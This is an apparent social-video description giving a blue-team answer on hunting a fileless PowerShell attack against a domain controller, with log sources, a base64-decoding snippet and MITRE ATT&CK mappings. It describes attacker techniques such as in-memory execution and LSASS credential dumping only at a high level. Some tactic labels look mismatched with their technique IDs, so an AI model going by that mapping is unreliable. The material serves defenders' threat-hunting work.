Day 05/100 : Answer 👇 In Description

Answer: Day 05/100
This is a classic Fileless Malware Attack via PowerShell Living-off-the-Land.

What's likely happening:
Attacker executed a base64 encoded PowerShell command that ran entirely in memory never touched the disk.

3 seconds = payload downloaded, executed, and cleaned up before EDR could scan it.

Domain Controller targeted = attacker wants highest privilege machine in the network.

EDR silent because no malicious file was written nothing to scan

Attacker likely dumped credentials or created a backdoor silently in those 3 seconds.

How you hunt it:
1. Decode the base64 immediately → [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("paste here"))
2. PowerShell Event ID 4104 → Script Block Logging → what was the full command. Grab it
3. Event ID 4688 → process creation → what spawned powershell.exe?
4. Check DC memory → any new scheduled tasks or services created in that window.
5. Network logs → did DC make any outbound connections in those 3 seconds.
6. Hunt same encoded command across all machines → was DC the only target.

MITRE ATT&CK Mapping:

1. T1059.001 — PowerShell Defense Evasion
2. T1027 — Obfuscated Files / Base64 Defense Evasion
3. T1140 — Deobfuscate / Decode Files Credential Access
4. T1003.001 — LSASS Memory Dump Collection
5. T1560 — Archive Collected Data

#blueteam #soc #cybersecurity
#100daysofcybersecurity #threathunting

Видео Day 05/100 : Answer 👇 In Description канала Manjil Katuwal - Hiro001